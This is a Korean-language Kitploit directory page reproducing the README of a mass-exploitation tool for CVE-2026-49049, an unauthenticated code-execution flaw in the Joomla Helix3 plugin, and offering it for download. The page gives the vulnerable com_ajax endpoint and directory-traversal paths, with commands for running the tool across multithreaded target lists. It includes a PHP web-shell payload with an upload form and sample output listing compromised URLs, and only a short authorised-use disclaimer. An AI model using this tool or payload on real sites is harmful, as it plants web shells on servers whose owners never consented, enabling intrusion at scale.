Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-49049 — 대규모 취약점 스캐너 for CVE-2026-49049 – Joomla Helix3 플러그인의 인증되지 않은 원격 코드 실행. 멀티스레드 방식으로, 실행된 PHP 페이로드와 원시 PHP 페이로드를 모두 탐지합니다. | Kitploit
도구/GitHubGitHub/jenderal92/cve-2026-49049
Vulnerability ScannersWeb Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

대규모 취약점 스캐너 for CVE-2026-49049 – Joomla Helix3 플러그인의 인증되지 않은 원격 코드 실행. 멀티스레드 방식으로, 실행된 PHP 페이로드와 원시 PHP 페이로드를 모두 탐지합니다.

저장소 보기
1141개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-49049 대량 스캐너

CVE-2026-49049용 대량 취약점 스캐너 - Joomla Helix3 프레임워크의 인증되지 않은 원격 코드 실행.


📌 설명

이 도구는 Helix3 플러그인에서 발견된 CVE-2026-49049 취약점에 대해 여러 Joomla 사이트를 검사합니다. 이 취약점을 통해 인증되지 않은 공격자가 대상 서버에 임의의 PHP 코드를 업로드하고 실행할 수 있습니다.

스캐너는 다음을 시도합니다:

  1. helix3 플러그인과 함께 com_ajax 엔드포인트를 악용합니다.
  2. 무해한 PHP 정보/페이로드 파일을 업로드합니다.
  3. 파일이 실행되는지 아니면 원시 PHP로만 저장되는지 감지합니다.

⚡ 기능

  • 멀티스레딩을 통한 대량 스캔(기본 20개 스레드).
  • 두 가지 탐지 모드:
    • ✅ 취약함 – PHP 코드가 실행됨(성공적인 RCE).
    • ⚠️ 원시 PHP – 파일이 업로드되었지만 실행되지 않음(코드 노출).
  • 임의의 파일명을 사용한 자동 페이로드 생성.
  • 추후 분석을 위해 별도 파일로 출력 저장.
  • 경량이며 타임아웃 처리를 통한 빠른 속도.

📦 전제 조건

  • Python 2.7
  • requests 라이브러리
root@kitploit:~
pip install requests

🛠 설치

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 사용법

root@kitploit:~
python2 cve-2026-49049.py targets.txt

입력 형식

targets.txt의 각 줄에는 도메인 또는 IP 하나를 포함해야 합니다:

root@kitploit:~
example.com
https://example.com
http://192.168.1.100

출력 파일

파일 설명 results.txt 페이로드가 실행된 취약한 URL rez.txt 페이로드가 업로드되었지만 실행되지 않은 URL(원시 PHP)


출력 예시

root@kitploit:~
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ 구성

스크립트 내에서 다음 변수를 조정할 수 있습니다:

변수 기본값 설명 THREADS 20 동시 스레드 수 PATHS ['../../../', '../../../../'] 디렉터리 트래버설 경로 TIMEOUT 5 HTTP 요청 타임아웃 RESULT_FILE 'results.txt' 취약한 사이트용 출력 파일 RAW_RESULT_FILE 'rez.txt' 원시 PHP 사이트용 출력 파일


🧠 작동 방식

스크립트는 다음 주소로 POST 요청을 전송합니다:

root@kitploit:~
/index.php?option=com_ajax&plugin=helix3&format=json

다음 작업을 수행하는 페이로드와 함께:

  1. 디렉터리 트래버설 경로를 지정합니다(예: ../../../)
  2. 임의의 이름으로 PHP 파일을 업로드합니다
  3. 간단한 웹 셸/정보 페이지를 포함합니다

그런 다음 파일에 접근할 수 있는지, PHP 코드가 실행되는지 아니면 일반 텍스트로만 표시되는지 확인합니다.

페이로드 예시

root@kitploit:~
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ 면책 조항

이 도구는 교육 및 승인된 테스트 목적으로만 사용하십시오.

소유하지 않았거나 명시적인 테스트 허가를 받지 않은 시스템에 대해 이 도구를 무단으로 사용하는 것은 불법입니다. 작성자는 이 도구로 인한 오용이나 피해에 대해 책임을 지지 않습니다.

추가 면책 조항 Jenderal92의 표지에서 면책 조항을 확인할 수 있습니다. 여기에서 확인하세요!!!


도구 다운로드